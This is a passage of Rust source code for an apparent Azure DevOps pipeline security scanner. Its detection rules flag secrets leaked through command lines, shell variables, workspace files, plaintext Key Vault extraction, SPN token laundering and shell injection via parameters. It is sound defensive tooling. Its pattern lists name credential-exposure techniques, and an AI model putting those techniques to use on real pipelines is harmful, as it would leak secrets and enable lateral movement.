1861        // Read identifier
1862        let name_start = i + 1;
1863        let mut j = name_start;
1864        while j < bytes.len() {
1865            let c = bytes[j];
1866            if c.is_ascii_alphanumeric() || c == b'_' {
1867                j += 1;
1868            } else {
1869                break;
1870            }
1871        }
1872        if j == name_start {
1873            i += 1;
1874            continue;
1875        }
1876        // Skip whitespace, then expect `=`
1877        let mut k = j;
1878        while k < bytes.len() && (bytes[k] == b' ' || bytes[k] == b'\t') {
1879            k += 1;
1880        }
1881        if k >= bytes.len() || bytes[k] != b'=' {
1882            i = j;
1883            continue;
1884        }
1885        // Skip `=` and whitespace
1886        k += 1;
1887        while k < bytes.len() && (bytes[k] == b' ' || bytes[k] == b'\t') {
1888            k += 1;
1889        }
1890        // Look at the rest of this logical line (until `\n`).
1891        let line_end = lower[k..].find('\n').map(|p| k + p).unwrap_or(bytes.len());
1892        let rhs = &lower[k..line_end];
1893        if SAS_MINT_TOKENS.iter().any(|t| rhs.contains(t)) {
1894            // Recover original-case variable name from `body` at the same byte
1895            // offsets — `lower` and `body` share UTF-8 byte layout for ASCII,
1896            // and identifiers in PowerShell are ASCII in the corpus.
1897            let name = body
1898                .get(name_start..j)
1899                .unwrap_or(&lower[name_start..j])
1900                .to_string();
1901            if !out.iter().any(|n: &String| n.eq_ignore_ascii_case(&name)) {
1902                out.push(name);
1903            }
1904        }
1905        i = j;
1906    }
1907    out
1908}
1909
1910/// Rule: pipeline step uses an Azure VM remote-execution primitive
1911/// (Set-AzVMExtension/CustomScriptExtension, Invoke-AzVMRunCommand,
1912/// `az vm run-command invoke`, `az vm extension set`) where the executed
1913/// command line is constructed from a pipeline secret or a freshly-minted
1914/// SAS token.
1915///
1916/// Pipeline-to-VM lateral movement primitive: every pipeline run can RCE every
1917/// VM in scope, and the SAS/secret embedded in the command line is logged in
1918/// plaintext on the VM and in the ARM extension status JSON.
1919///
1920/// Detection: read each Step's `META_SCRIPT_BODY`. If the body contains a
1921/// remote-exec tool name AND (it interpolates a known pipeline secret variable
1922/// OR it mints a SAS token in the same body), fire one finding per step.
1923pub fn vm_remote_exec_via_pipeline_secret(graph: &AuthorityGraph) -> Vec<Finding> {
1924    let mut findings = Vec::new();
1925
1926    for step in graph.nodes_of_kind(NodeKind::Step) {
1927        let body = match step.metadata.get(META_SCRIPT_BODY) {
1928            Some(b) if !b.is_empty() => b,
1929            _ => continue,
1930        };
1931        let body_lower = body.to_lowercase();
1932        if !body_uses_vm_remote_exec(&body_lower) {
1933            continue;
1934        }
1935
1936        let secret_names = step_secret_var_names(graph, step.id);
1937        let secret_interpolated = secret_names
1938            .iter()
1939            .any(|name| body_interpolates_var(body, name));
1940        let mints_sas = body_mints_sas(&body_lower);
1941
1942        if !secret_interpolated && !mints_sas {
1943            continue;
1944        }
1945
1946        // Pick a single tool name for the message.
1947        let tool = VM_REMOTE_EXEC_TOKENS
1948            .iter()
1949            .find(|t| body_lower.contains(*t))
1950            .copied()
1951            .unwrap_or("Set-AzVMExtension");
1952
1953        let trigger = if secret_interpolated {
1954            "interpolating a pipeline secret into the executed command line"
1955        } else {
1956            "embedding a freshly-minted SAS token into the executed command line"
1957        };
1958
1959        let mut nodes_involved = vec![step.id];
1960        // Include the secret nodes the step has access to so consumers can
1961        // attribute the finding to the leaked credential.
1962        for edge in graph.edges_from(step.id) {
1963            if edge.kind == EdgeKind::HasAccessTo {
1964                if let Some(n) = graph.node(edge.to) {
1965                    if n.kind == NodeKind::Secret {
1966                        nodes_involved.push(n.id);
1967                    }
1968                }
1969            }
1970        }
1971
1972        findings.push(Finding {
1973            severity: Severity::High,
1974            category: FindingCategory::VmRemoteExecViaPipelineSecret,
1975            path: None,
1976            nodes_involved,
1977            message: format!(
1978                "Step '{}' uses {} {} — pipeline-to-VM RCE primitive; credential is logged on the VM and in ARM extension status",
1979                step.name, tool, trigger
1980            ),
1981            recommendation: Recommendation::Manual {
1982                action: "Stage the script on the VM and pass the SAS via env var or protectedSettings (encrypted, not logged); avoid embedding secrets in commandToExecute".into(),
1983            },
1984            source: FindingSource::BuiltIn,
1985                extras: FindingExtras::default(),
1986});
1987    }
1988
1989    findings
1990}
1991
1992/// Heuristic: line prefix looks like a bash/sh assignment to an env var.
1993/// Conservative — only matches when the LHS contains `<keyword>? IDENT=` and
1994/// nothing after the `=` other than optional opening quote characters.
1995fn matches_bash_assignment(lhs: &str) -> bool {
1996    // `export FOO=`, `declare FOO=`, `local FOO=`, `readonly FOO=`, plain `FOO=`
1997    let after_keyword = strip_one_of(lhs, &["export ", "declare ", "local ", "readonly "])
1998        .unwrap_or(lhs)
1999        .trim_start();
2000    // Allow trailing opening-quote characters between `=` and the secret ref.
2001    let trimmed = after_keyword.trim_end_matches(['"', '\'']);
2002    let Some(ident) = trimmed.strip_suffix('=') else {
2003        return false;
2004    };
2005    !ident.is_empty()
2006        && ident.chars().all(is_shell_var_char)
2007        && !ident.starts_with(|c: char| c.is_ascii_digit())
2008}
2009
2010/// Heuristic: line prefix looks like a PowerShell assignment.
2011fn matches_powershell_assignment(lhs: &str) -> bool {
2012    // Strip trailing opening quote and whitespace so `$x = "$(SECRET)` matches.
2013    let trimmed = lhs.trim_end().trim_end_matches(['"', '\'']).trim_end();
2014    if let Some(before_eq) = trimmed.strip_suffix('=') {
2015        let before_eq = before_eq.trim_end();
2016        if before_eq.starts_with('$') {
2017            return true;
2018        }
2019    }
2020    // `Set-Variable ... -Value`
2021    if trimmed.contains("Set-Variable") && trimmed.contains("-Value") {
2022        return true;
2023    }
2024    false
2025}
2026
2027fn is_shell_var_char(c: char) -> bool {
2028    c.is_ascii_alphanumeric() || c == '_'
2029}
2030
2031fn strip_one_of<'a>(s: &'a str, prefixes: &[&str]) -> Option<&'a str> {
2032    for p in prefixes {
2033        if let Some(rest) = s.strip_prefix(p) {
2034            return Some(rest);
2035        }
2036    }
2037    None
2038}
2039
2040/// Rule: pipeline secret exported via shell variable inside an inline script.
2041///
2042/// Severity: High. ADO masks the literal token `$(SECRET)` when it appears in
2043/// log output, but masking happens on the rendered command string before the
2044/// shell runs. Once the value is bound to a shell variable, downstream
2045/// transcripts (`Start-Transcript`, `bash -x`, terraform `TF_LOG=DEBUG`,
2046/// `az --debug`) print the cleartext.
2047pub fn secret_to_inline_script_env_export(graph: &AuthorityGraph) -> Vec<Finding> {
2048    let mut findings = Vec::new();
2049
2050    for step in graph.nodes_of_kind(NodeKind::Step) {
2051        let Some(script) = step.metadata.get(META_SCRIPT_BODY) else {
2052            continue;
2053        };
2054        if script.is_empty() {
2055            continue;
2056        }
2057        let secrets = step_secret_names(graph, step.id);
2058        let exposed: Vec<String> = secrets
2059            .into_iter()
2060            .filter(|s| script_assigns_secret_to_shell_var(script, s))
2061            .collect();
2062
2063        if exposed.is_empty() {
2064            continue;
2065        }
2066
2067        let n = exposed.len();
2068        let preview: String = exposed
2069            .iter()
2070            .take(3)
2071            .map(|s| format!("$({s})"))
2072            .collect::<Vec<_>>()
2073            .join(", ");
2074        let suffix = if n > 3 {
2075            format!(", and {} more", n - 3)
2076        } else {
2077            String::new()
2078        };
2079        let secret_node_ids: Vec<NodeId> = graph
2080            .edges_from(step.id)
2081            .filter(|e| e.kind == EdgeKind::HasAccessTo)
2082            .filter_map(|e| graph.node(e.to))
2083            .filter(|n| n.kind == NodeKind::Secret && exposed.contains(&n.name))
2084            .map(|n| n.id)
2085            .collect();
2086
2087        let mut nodes_involved = vec![step.id];
2088        nodes_involved.extend(secret_node_ids);
2089
2090        findings.push(Finding {
2091            severity: Severity::High,
2092            category: FindingCategory::SecretToInlineScriptEnvExport,
2093            path: None,
2094            nodes_involved,
2095            message: format!(
2096                "Step '{}' assigns pipeline secret(s) {preview}{suffix} to shell variables inside an inline script — once bound to a variable the value bypasses ADO's $(SECRET) log mask and will appear in any transcript (Start-Transcript, bash -x, terraform/az --debug)",
2097                step.name
2098            ),
2099            recommendation: Recommendation::TsafeRemediation {
2100                command: "tsafe exec --ns <scoped-namespace> -- <command>".to_string(),
2101                explanation: "Inject the secret as an env var on the step itself (ADO `env:` block) instead of materialising it inside the script body. The value still reaches the process but never travels through a shell variable assignment that transcripts can capture.".to_string(),
2102            },
2103            source: FindingSource::BuiltIn,
2104                extras: FindingExtras::default(),
2105});
2106    }
2107
2108    findings
2109}
2110
2111/// How a `resources.repositories[].ref` value resolves for the purposes of
2112/// the `template_extends_unpinned_branch` rule.
2113enum RepositoryRefClass {
2114    /// SHA-pinned, tag-pinned — code at the consumer is immutable.
2115    Pinned,
2116    /// No `ref:` field — resolves to the repo's default branch.
2117    DefaultBranch,
2118    /// `refs/heads/<name>` or bare branch — mutable.
2119    MutableBranch(String),
2120}
2121
2122fn classify_repository_ref(ref_value: Option<&str>) -> RepositoryRefClass {
2123    let raw = match ref_value {
2124        None => return RepositoryRefClass::DefaultBranch,
2125        Some(s) if s.trim().is_empty() => return RepositoryRefClass::DefaultBranch,
2126        Some(s) => s.trim(),
2127    };
2128
2129    // Bare 40+ hex SHA — pinned.
2130    if is_hex_sha(raw) {
2131        return RepositoryRefClass::Pinned;
2132    }
2133
2134    // refs/tags/<x> — pinned.
2135    if let Some(tag) = raw.strip_prefix("refs/tags/") {
2136        if !tag.is_empty() {
2137            return RepositoryRefClass::Pinned;
2138        }
2139    }
2140
2141    // refs/heads/<x> — mutable, unless trailing segment is a SHA.
2142    if let Some(branch) = raw.strip_prefix("refs/heads/") {
2143        if is_hex_sha(branch) {
2144            return RepositoryRefClass::Pinned;
2145        }
2146        return RepositoryRefClass::MutableBranch(branch.to_string());
2147    }
2148
2149    // Bare value — treat as a branch name.
2150    RepositoryRefClass::MutableBranch(raw.to_string())
2151}
2152
2153fn is_hex_sha(s: &str) -> bool {
2154    s.len() >= 40 && s.chars().all(|c| c.is_ascii_hexdigit())
2155}
2156
2157/// Rule: a SAS token minted in-pipeline is passed as a CLI argument or
2158/// interpolated into `commandToExecute` / `scriptArguments` / `--arguments` /
2159/// `-ArgumentList` rather than via env var or stdin.
2160///
2161/// Even short-lived SAS tokens in argv hit Linux `/proc/*/cmdline`, Windows
2162/// ETW process-create events, and ARM extension status — logged for the
2163/// SAS lifetime.
2164///
2165/// Detection: read each Step's `META_SCRIPT_BODY`. Body must (a) mint a SAS
2166/// token AND (b) reference a command-line sink keyword. Heuristic acceptable:
2167/// the goal is to catch the corpus pattern, not perfect specificity.
2168pub fn short_lived_sas_in_command_line(graph: &AuthorityGraph) -> Vec<Finding> {
2169    let mut findings = Vec::new();
2170
2171    for step in graph.nodes_of_kind(NodeKind::Step) {
2172        let body = match step.metadata.get(META_SCRIPT_BODY) {
2173            Some(b) if !b.is_empty() => b,
2174            _ => continue,
2175        };
2176        let body_lower = body.to_lowercase();
2177
2178        if !body_mints_sas(&body_lower) {
2179            continue;
2180        }
2181        if !body_has_cmdline_sink(&body_lower) {
2182            continue;
2183        }
2184
2185        // Tighten precision: at least one minted-SAS variable must actually
2186        // appear interpolated somewhere in the script body. This filters out
2187        // scripts that mint a SAS purely for upload-to-blob and never put it
2188        // on argv.
2189        let sas_vars = powershell_sas_assignments(body);
2190        let mut interpolated_var: Option<String> = None;
2191        for v in &sas_vars {
2192            if body_interpolates_var(body, v) {
2193                interpolated_var = Some(v.clone());
2194                break;
2195            }
2196        }
2197        // If we couldn't bind a SAS var (e.g. inline `az`-CLI subshell), fall
2198        // back to "mint+sink in same script" — still better than no signal.
2199        let evidence = interpolated_var
2200            .as_deref()
2201            .map(|v| format!("$ {v} interpolated into argv"))
2202            .unwrap_or_else(|| "SAS-mint and command-line sink in same script".to_string());
2203
2204        findings.push(Finding {
2205            severity: Severity::Medium,
2206            category: FindingCategory::ShortLivedSasInCommandLine,
2207            path: None,
2208            nodes_involved: vec![step.id],
2209            message: format!(
2210                "Step '{}' mints a SAS token and passes it on the command line ({}) — argv lands in /proc, ETW, and ARM extension status for the token's lifetime",
2211                step.name, evidence
2212            ),
2213            recommendation: Recommendation::Manual {
2214                action: "Pass the SAS via env var, stdin, or VM-extension protectedSettings; never put SAS tokens in commandToExecute / --arguments / -ArgumentList".into(),
2215            },
2216            source: FindingSource::BuiltIn,
2217                extras: FindingExtras::default(),
2218});
2219    }
2220
2221    findings
2222}
2223
2224/// Returns true if `line` contains a sink that writes its left-hand-side
2225/// content to a file path. Recognises the common bash and PowerShell
2226/// "write to file" idioms.
2227fn line_writes_to_file(line: &str) -> bool {
2228    // bash: `>`, `>>`, `tee`, `cat <<`/`<<-` heredoc redirected with `>`
2229    if line.contains(" > ")
2230        || line.contains(" >> ")
2231        || line.contains(">/")
2232        || line.contains(">>/")
2233        || line.contains("| tee ")
2234        || line.contains("| tee -")
2235        || line.starts_with("tee ")
2236    {
2237        return true;
2238    }
2239    // PowerShell: Out-File, Set-Content, Add-Content, [IO.File]::WriteAllText
2240    let lower = line.to_lowercase();
2241    if lower.contains("out-file")
2242        || lower.contains("set-content")
2243        || lower.contains("add-content")
2244        || lower.contains("writealltext")
2245        || lower.contains("writealllines")
2246    {
2247        return true;
2248    }
2249    false
2250}
2251
2252/// Returns true if `line` references a workspace path or a config-file
2253/// extension we consider risky for secret materialisation.
2254fn line_references_workspace_path(line: &str) -> bool {
2255    let lower = line.to_lowercase();
2256    if lower.contains("$(system.defaultworkingdirectory)")
2257        || lower.contains("$(build.sourcesdirectory)")
2258        || lower.contains("$(pipeline.workspace)")
2259        || lower.contains("$(agent.builddirectory)")
2260        || lower.contains("$(agent.tempdirectory)")
2261    {
2262        return true;
2263    }
2264    // Common credential / config file extensions
2265    const RISKY_EXT: &[&str] = &[
2266        ".tfvars",
2267        ".env",
2268        ".hcl",
2269        ".pfx",
2270        ".key",
2271        ".pem",
2272        ".crt",
2273        ".p12",
2274        ".kubeconfig",
2275        ".jks",
2276        ".keystore",
2277    ];
2278    RISKY_EXT.iter().any(|ext| lower.contains(ext))
2279}
2280
2281/// Heuristic: returns true if `script` materialises `secret` to a workspace
2282/// file. Looks for a single line that contains the secret reference AND a
2283/// "write to file" sink AND a workspace/credfile path target.
2284///
2285/// Also detects the heredoc + Out-File pattern across multiple lines:
2286/// the secret appears inside a `@" ... "@` block whose final pipe is
2287/// `Out-File <workspace-path>`.
2288fn script_materialises_secret_to_file(script: &str, secret: &str) -> bool {
2289    let needle = format!("$({secret})");
2290
2291    // Pass 1: single-line write. Catches `echo $(SECRET) > /tmp/x.env`,
2292    // `Out-File ... $(SECRET) ...`, etc.
2293    for line in script.lines() {
2294        if line.contains(&needle)
2295            && line_writes_to_file(line)
2296            && line_references_workspace_path(line)
2297        {
2298            return true;
2299        }
2300    }
2301
2302    // Pass 2: PowerShell pattern `$X = "$(SECRET)"` followed by the variable
2303    // being piped into Out-File / Set-Content with a workspace path. We
2304    // detect this conservatively: if any line assigns `$x = "$(SECRET)"`
2305    // AND any *later* line both writes-to-file and references a workspace
2306    // path, we flag it. False-positive risk is low because the ASLR-style
2307    // `$x` typically won't be reused for unrelated content within the same
2308    // inline block.
2309    let mut secret_bound_to_var = false;
2310    for line in script.lines() {
2311        let trimmed = line.trim();
2312        if !secret_bound_to_var
2313            && trimmed.contains(&needle)
2314            && trimmed.starts_with('$')
2315            && trimmed.contains('=')
2316        {
2317            secret_bound_to_var = true;
2318            continue;
2319        }
2320        if secret_bound_to_var && line_writes_to_file(line) && line_references_workspace_path(line)
2321        {
2322            return true;
2323        }
2324    }
2325
2326    false
2327}
2328
2329/// Rule: pipeline secret materialised to a file under the agent workspace.
2330///
2331/// Severity: High. Files written under `$(System.DefaultWorkingDirectory)` /
2332/// `$(Build.SourcesDirectory)` survive the writing step's lifetime, are
2333/// uploaded by `PublishPipelineArtifact` tasks (sometimes accidentally), and
2334/// remain readable by every subsequent step in the same job.
2335pub fn secret_materialised_to_workspace_file(graph: &AuthorityGraph) -> Vec<Finding> {
2336    let mut findings = Vec::new();
2337
2338    for step in graph.nodes_of_kind(NodeKind::Step) {
2339        let Some(script) = step.metadata.get(META_SCRIPT_BODY) else {
2340            continue;
2341        };
2342        if script.is_empty() {
2343            continue;
2344        }
2345        let secrets = step_secret_names(graph, step.id);
2346        let materialised: Vec<String> = secrets
2347            .into_iter()
2348            .filter(|s| script_materialises_secret_to_file(script, s))
2349            .collect();
2350
2351        if materialised.is_empty() {
2352            continue;
2353        }
2354
2355        let n = materialised.len();
2356        let preview: String = materialised
2357            .iter()
2358            .take(3)
2359            .map(|s| format!("$({s})"))
2360            .collect::<Vec<_>>()
2361            .join(", ");
2362        let suffix = if n > 3 {
2363            format!(", and {} more", n - 3)
2364        } else {
2365            String::new()
2366        };
2367
2368        let secret_node_ids: Vec<NodeId> = graph
2369            .edges_from(step.id)
2370            .filter(|e| e.kind == EdgeKind::HasAccessTo)
2371            .filter_map(|e| graph.node(e.to))
2372            .filter(|n| n.kind == NodeKind::Secret && materialised.contains(&n.name))
2373            .map(|n| n.id)
2374            .collect();
2375
2376        let mut nodes_involved = vec![step.id];
2377        nodes_involved.extend(secret_node_ids);
2378
2379        findings.push(Finding {
2380            severity: Severity::High,
2381            category: FindingCategory::SecretMaterialisedToWorkspaceFile,
2382            path: None,
2383            nodes_involved,
2384            message: format!(
2385                "Step '{}' writes pipeline secret(s) {preview}{suffix} to a file under the agent workspace — the file persists for the rest of the job, is readable by every subsequent step, and may be uploaded by PublishPipelineArtifact",
2386                step.name
2387            ),
2388            recommendation: Recommendation::Manual {
2389                action: "Replace inline secret materialisation with the `secureFile` task (downloaded to a temp dir with 0600 perms and auto-deleted), or pass the secret to the consuming tool over stdin / an env var instead of via a workspace file. If a file is unavoidable, write under `$(Agent.TempDirectory)` and `chmod 600` immediately.".into(),
2390            },
2391            source: FindingSource::BuiltIn,
2392                extras: FindingExtras::default(),
2393});
2394    }
2395
2396    findings
2397}
2398
2399/// Returns true if `script` contains a Key Vault → plaintext extraction
2400/// pattern that lands the secret in a non-`SecureString` variable.
2401fn script_extracts_keyvault_to_plaintext(script: &str) -> bool {
2402    let lower = script.to_lowercase();
2403    // New syntax: Get-AzKeyVaultSecret ... -AsPlainText
2404    if lower.contains("get-azkeyvaultsecret") && lower.contains("-asplaintext") {
2405        return true;
2406    }
2407    // ConvertFrom-SecureString ... -AsPlainText (PS 7+) — flat plaintext extraction
2408    if lower.contains("convertfrom-securestring") && lower.contains("-asplaintext") {
2409        return true;
2410    }
2411    // Old syntax: ($x = (Get-AzKeyVaultSecret ...).SecretValueText)
2412    if lower.contains("get-azkeyvaultsecret") && lower.contains(".secretvaluetext") {
2413        return true;
2414    }
2415    // Even older: BSTR pattern — ConvertToString on PtrToStringAuto
2416    if lower.contains("get-azkeyvaultsecret") && lower.contains("ptrtostringauto") {
2417        return true;
2418    }
2419    false
2420}
2421
2422/// Rule: PowerShell pulls a Key Vault secret as plaintext inside an inline
2423/// script. The value never crosses the ADO variable-group boundary so
2424/// pipeline log masking does not apply — verbose `Az` / PowerShell logging
2425/// (`Set-PSDebug -Trace`, `$VerbosePreference = "Continue"`, error stack
2426/// traces) will print the cleartext credential.
2427///
2428/// Severity: Medium. Lower than the materialisation rules because the value
2429/// is at least kept in process memory (vs. on disk), but still a real
2430/// exposure path that pipeline-level secret rotation alone does not fix.
2431pub fn keyvault_secret_to_plaintext(graph: &AuthorityGraph) -> Vec<Finding> {
2432    let mut findings = Vec::new();
2433
2434    for step in graph.nodes_of_kind(NodeKind::Step) {
2435        let Some(script) = step.metadata.get(META_SCRIPT_BODY) else {
2436            continue;
2437        };
2438        if script.is_empty() {
2439            continue;
2440        }
2441        if !script_extracts_keyvault_to_plaintext(script) {
2442            continue;
2443        }
2444
2445        findings.push(Finding {
2446            severity: Severity::Medium,
2447            category: FindingCategory::KeyVaultSecretToPlaintext,
2448            path: None,
2449            nodes_involved: vec![step.id],
2450            message: format!(
2451                "Step '{}' extracts a Key Vault secret as plaintext inside an inline script (-AsPlainText / .SecretValueText) — value bypasses ADO variable-group masking and is printed by Az verbose logging or any error stack trace",
2452                step.name
2453            ),
2454            recommendation: Recommendation::Manual {
2455                action: "Keep the secret as a `SecureString`: drop `-AsPlainText`, pass the SecureString directly to cmdlets that accept it (e.g. `New-PSCredential`, `Connect-AzAccount -ServicePrincipal -Credential ...`), and only convert to plaintext at the moment of consumption, scoped to a single expression. For values that must be plaintext (REST calls, env vars) prefer ADO variable groups linked to Key Vault — the value then participates in pipeline log masking.".into(),
2456            },
2457            source: FindingSource::BuiltIn,
2458                extras: FindingExtras::default(),
2459});
2460    }
2461
2462    findings
2463}
2464
2465/// Returns true when `name` (case-insensitive) looks like a production
2466/// service-connection name. Matches `prod` / `production` / `prd` either as
2467/// the entire name, a token surrounded by `-`/`_`, or a leading/trailing
2468/// segment (`prod-foo`, `foo-prd`). Conservative: avoids matching
2469/// substrings like "approver" or "reproduce".
2470fn looks_like_prod_connection(name: &str) -> bool {
2471    let lower = name.to_lowercase();
2472    let token_match = |s: &str| {
2473        lower == s
2474            || lower.contains(&format!("-{s}-"))
2475            || lower.contains(&format!("_{s}_"))
2476            || lower.ends_with(&format!("-{s}"))
2477            || lower.ends_with(&format!("_{s}"))
2478            || lower.starts_with(&format!("{s}-"))
2479            || lower.starts_with(&format!("{s}_"))
2480    };
2481    token_match("prod") || token_match("production") || token_match("prd")
2482}
2483
2484/// Returns true when an inline script body looks like it laundering federated
2485/// SPN/OIDC token material into a pipeline variable via
2486/// `##vso[task.setvariable]`. Used to escalate addspn_with_inline_script's
2487/// message wording when explicit laundering is detected.
2488fn script_launders_spn_token(s: &str) -> bool {
2489    let lower = s.to_lowercase();
2490    if !lower.contains("##vso[task.setvariable") {
2491        return false;
2492    }
2493    let token_markers = [
2494        "$env:idtoken",
2495        "$env:serviceprincipalkey",
2496        "$env:serviceprincipalid",
2497        "$env:tenantid",
2498        "arm_oidc_token",
2499        "arm_client_id",
2500        "arm_client_secret",
2501        "arm_tenant_id",
2502    ];
2503    token_markers.iter().any(|m| lower.contains(m))
2504}
2505
2506/// Rule: `terraform apply -auto-approve` against a production service
2507/// connection without an environment approval gate.
2508///
2509/// Combines three signals on a Step node:
2510///   1. `META_TERRAFORM_AUTO_APPROVE` = "true" (set by the parser when an
2511///      inline script runs `terraform apply --auto-approve`, or a
2512///      `TerraformCLI@N` task has `command: apply` + commandOptions
2513///      containing `auto-approve`).
2514///   2. `META_SERVICE_CONNECTION_NAME` matches a production-named pattern
2515///      (`prod`, `production`, `prd`), OR the step is linked via
2516///      `HasAccessTo` to an Identity service-connection node whose name
2517///      matches that pattern.
2518///   3. The step is NOT inside an `environment:`-bound deployment job
2519///      (parser sets `META_ENV_APPROVAL` for those steps).
2520///
2521/// Severity: Critical. Bypasses the only ADO-side change-control on
2522/// infra rewrites.
2523pub fn terraform_auto_approve_in_prod(graph: &AuthorityGraph) -> Vec<Finding> {
2524    let mut findings = Vec::new();
2525
2526    for step in graph.nodes_of_kind(NodeKind::Step) {
2527        let auto_approve = step
2528            .metadata
2529            .get(META_TERRAFORM_AUTO_APPROVE)
2530            .map(|v| v == "true")
2531            .unwrap_or(false);
2532        if !auto_approve {
2533            continue;
2534        }
2535
2536        // Step's own service-connection name (set by parser from
2537        // azureSubscription / connectedServiceName / etc).
2538        let direct_conn = step.metadata.get(META_SERVICE_CONNECTION_NAME).cloned();
2539
2540        // Walk HasAccessTo edges to find a service-connection Identity. This
2541        // catches steps that don't carry the name on themselves but inherit
2542        // an Identity node via the parser's edge.
2543        let edge_conn = graph
2544            .edges_from(step.id)
2545            .filter(|e| e.kind == EdgeKind::HasAccessTo)
2546            .filter_map(|e| graph.node(e.to))
2547            .find(|n| {
2548                n.kind == NodeKind::Identity
2549                    && n.metadata
2550                        .get(META_SERVICE_CONNECTION)
2551                        .map(|v| v == "true")
2552                        .unwrap_or(false)
2553            })
2554            .map(|n| n.name.clone());
2555
2556        let conn_name = match direct_conn.or(edge_conn) {
2557            Some(n) if looks_like_prod_connection(&n) => n,
2558            _ => continue,
2559        };
2560
2561        // Compensating control: an `environment:` binding routes the apply
2562        // through ADO's approval / check pipeline. Whether that environment
2563        // *actually* has approvers configured is invisible from YAML — so
2564        // downgrade Critical → Medium instead of skipping outright (the
2565        // previous behaviour silently dropped the finding even when the
2566        // environment was a CI-only approval-free passthrough).
2567        let env_gated = step
2568            .metadata
2569            .get(META_ENV_APPROVAL)
2570            .map(|v| v == "true")
2571            .unwrap_or(false);
2572        let (severity, suffix) = if env_gated {
2573            (
2574                Severity::Medium,
2575                " — `environment:` binding present (verify approvers are configured in the ADO Environments UI)",
2576            )
2577        } else {
2578            (
2579                Severity::Critical,
2580                " — any committer can rewrite prod infrastructure",
2581            )
2582        };
2583
2584        findings.push(Finding {
2585            severity,
2586            category: FindingCategory::TerraformAutoApproveInProd,
2587            path: None,
2588            nodes_involved: vec![step.id],
2589            message: format!(
2590                "Step '{}' runs `terraform apply -auto-approve` against production service connection '{}'{}",
2591                step.name, conn_name, suffix
2592            ),
2593            recommendation: Recommendation::Manual {
2594                action: "Move the apply step into a deployment job whose `environment:` is configured with required approvers in ADO, OR remove `-auto-approve` and run apply behind a manual checkpoint task. Combine with a non-shared agent pool so committers cannot pre-stage payloads.".into(),
2595            },
2596            source: FindingSource::BuiltIn,
2597                extras: FindingExtras::default(),
2598});
2599    }
2600
2601    findings
2602}
2603
2604/// Rule: `AzureCLI@2` task with `addSpnToEnvironment: true` AND an inline
2605/// script body. The inline script can launder federated SPN material
2606/// (`$env:idToken`, `$env:servicePrincipalKey`, `$env:tenantId`) into normal
2607/// pipeline variables via `##vso[task.setvariable]`, leaking OIDC tokens to
2608/// downstream tasks/artifacts un-masked.
2609///
2610/// Severity: High. Escalates message wording when the script body contains
2611/// explicit laundering patterns (`##vso[task.setvariable ...]` writing one
2612/// of the well-known token env vars or `ARM_OIDC_TOKEN`).
2613pub fn addspn_with_inline_script(graph: &AuthorityGraph) -> Vec<Finding> {
2614    let mut findings = Vec::new();
2615
2616    for step in graph.nodes_of_kind(NodeKind::Step) {
2617        let add_spn = step
2618            .metadata
2619            .get(META_ADD_SPN_TO_ENV)
2620            .map(|v| v == "true")
2621            .unwrap_or(false);
2622        if !add_spn {
2623            continue;
2624        }
2625
2626        let body = match step.metadata.get(META_SCRIPT_BODY) {
2627            Some(b) if !b.trim().is_empty() => b,
2628            _ => continue,
2629        };
2630
2631        let launders = script_launders_spn_token(body);
2632        let suffix = if launders {
2633            " — explicit token laundering detected (##vso[task.setvariable] writes federated token material)"
2634        } else {
2635            ""
2636        };
2637
2638        findings.push(Finding {
2639            severity: Severity::High,
2640            category: FindingCategory::AddSpnWithInlineScript,
2641            path: None,
2642            nodes_involved: vec![step.id],
2643            message: format!(
2644                "Step '{}' runs an inline script with addSpnToEnvironment:true — the federated SPN (idToken/servicePrincipalKey/tenantId) is exposed to script-controlled code and can be exfiltrated via setvariable{}",
2645                step.name, suffix
2646            ),
2647            recommendation: Recommendation::Manual {
2648                action: "Replace the inline script with `scriptPath:` pointing to a reviewed file in-repo, OR drop `addSpnToEnvironment: true` and use the task's first-class auth surface. Never emit federated token material via `##vso[task.setvariable]` — those values are inherited by every downstream task and may appear in logs.".into(),
2649            },
2650            source: FindingSource::BuiltIn,
2651                extras: FindingExtras::default(),
2652});
2653    }
2654
2655    findings
2656}
2657
2658/// Rule: free-form `type: string` parameter (no `values:` allowlist)
2659/// interpolated via `${{ parameters.<name> }}` directly into an inline
2660/// shell/PowerShell script body. ADO does not escape parameter values in
2661/// YAML emission, so any user with "queue build" can inject shell.
2662///
2663/// Detection requires the parser to populate
2664/// `AuthorityGraph::parameters` (currently ADO only) and to stamp Step
2665/// nodes with `META_SCRIPT_BODY`.
2666///
2667/// Severity: Medium.
2668pub fn parameter_interpolation_into_shell(graph: &AuthorityGraph) -> Vec<Finding> {
2669    if graph.parameters.is_empty() {
2670        return Vec::new();
2671    }
2672
2673    // Free-form string parameters: type is `string` (or unspecified — ADO's
2674    // default) AND no `values:` allowlist.
2675    let free_form: Vec<&str> = graph
2676        .parameters
2677        .iter()
2678        .filter(|(_, spec)| {
2679            !spec.has_values_allowlist
2680                && (spec.param_type.is_empty() || spec.param_type.eq_ignore_ascii_case("string"))
2681        })
2682        .map(|(name, _)| name.as_str())
2683        .collect();
2684
2685    if free_form.is_empty() {
2686        return Vec::new();
2687    }
2688
2689    let mut findings = Vec::new();
2690
2691    for step in graph.nodes_of_kind(NodeKind::Step) {
2692        let body = match step.metadata.get(META_SCRIPT_BODY) {
2693            Some(b) if !b.is_empty() => b,
2694            _ => continue,
2695        };
2696
2697        // Find every free-form parameter that appears interpolated in the
2698        // script body. Match both `${{ parameters.X }}` and `${{parameters.X}}`.
2699        let mut hits: Vec<&str> = Vec::new();
2700        for &name in &free_form {
2701            let needle_a = format!("${{{{ parameters.{name} }}}}");
2702            let needle_b = format!("${{{{parameters.{name}}}}}");
2703            if body.contains(&needle_a) || body.contains(&needle_b) {
2704                hits.push(name);
2705            }
2706        }
2707
2708        if hits.is_empty() {
2709            continue;
2710        }
2711
2712        hits.sort();
2713        hits.dedup();
2714        let names = hits.join(", ");
2715
2716        findings.push(Finding {
2717            severity: Severity::Medium,
2718            category: FindingCategory::ParameterInterpolationIntoShell,
2719            path: None,
2720            nodes_involved: vec![step.id],
2721            message: format!(
2722                "Step '{}' interpolates free-form string parameter(s) [{}] into an inline script — anyone with 'queue build' permission can inject shell commands",
2723                step.name, names
2724            ),
2725            recommendation: Recommendation::Manual {
2726                action: "Add a `values:` allowlist to the parameter declaration to constrain accepted inputs, OR pass the parameter through the step's `env:` block so the runtime quotes it as a shell variable instead of YAML-interpolating raw text.".into(),
2727            },
2728            source: FindingSource::BuiltIn,
2729                extras: FindingExtras::default(),
2730});
2731    }
2732
2733    findings
2734}
2735
